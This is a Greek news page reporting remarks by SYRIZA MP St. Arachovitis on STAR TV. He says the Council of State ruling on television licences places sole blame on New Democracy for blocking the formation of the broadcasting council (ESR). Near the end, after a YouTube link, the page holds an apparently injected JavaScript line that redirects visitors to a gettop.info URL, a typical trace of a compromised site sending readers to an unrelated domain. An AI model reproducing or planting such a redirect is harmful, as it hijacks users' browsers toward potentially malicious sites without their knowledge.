Αραχωβίτης: Η απόφαση του ΣτΕ απέδωσε την αποκλειστική ευθύνη στη ΝΔ

0
12

 

Μιλώντας στην τηλεόραση του STAR και τη δημοσιογράφο Π.Τσαπανίδου για την απόφαση του ΣτΕ σχετικά με τις τηλεοπτικές άδειες, ο βουλευτής του ΣΥΡΙΖΑ Στ. Αραχωβίτης δήλωσε:

Το Συμβούλιο της Επικρατείας έχει αποφανθεί ήδη ότι το καθεστώς ανομίας που επικρατούσε επί 27 χρόνια στο ραδιοτηλεοπτικό τοπίο, είναι αντισυνταγματικό. Αυτό που αμφισβητεί επί της ουσίας είναι ότι θα έπρεπε να έχει εμπλακεί το ΕΣΡ. Κι εδώ μπαίνει το εύλογο ερώτημα: «Με ποιού την ευθύνη δεν έχει συγκροτηθεί ακόμη το Συμβούλιο»;

Η ΝΔ δεν έχει συναινέσει μέχρι τώρα, παρά τις επανηλλειμένες προσπάθειές μας, να συγκροτηθεί ΕΣΡ και αξίζει να δούμε αν θα συνεχίσει να ταυτίζεται με τη διαπλοκή και να μπλοκάρει τη διαδικασία. Εμείς πάντως τάξη θα βάλουμε, είτε αρέσει στη διαπλοκή είτε όχι.

Αυτό που θα υπάρξει από Δευτέρα είναι βεβαίωση προσωρινής άδειας λειτουργίας για τα υφιστάμενα κανάλια. Όταν συγκροτηθεί το ΕΣΡ, θα έχει την αρμοδιότητα να προτείνει, με τεκμηριωμένη γνώμη, όπως ορίζει ο Νόμος, τον αριθμό των τηλεοπτικών αδειών Αλλά έπρεπε να φτάσουμε εδώ που έχουμε φτάσει, για να συναινέσει η αξιωματική αντιπολίτευση, και δια του κ. Φορτσάκη, σήμερα, εδώ στο πλατό, στη συγκρότηση του Ε.Σ.Ρ;

Θεωρώ ότι η ΝΔ έλαβε το μήνυμα ότι η αντισυνταγματικότητα του νόμου κρίθηκε ακριβώς, στο σημείο που δε συναινούσε. Δηλαδή η απόφαση του ΣτΕ απέδωσε ουσιαστικά την αποκλειστική ευθύνη στη ΝΔ.

https://youtu.be/nyrB-ca1RwE setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here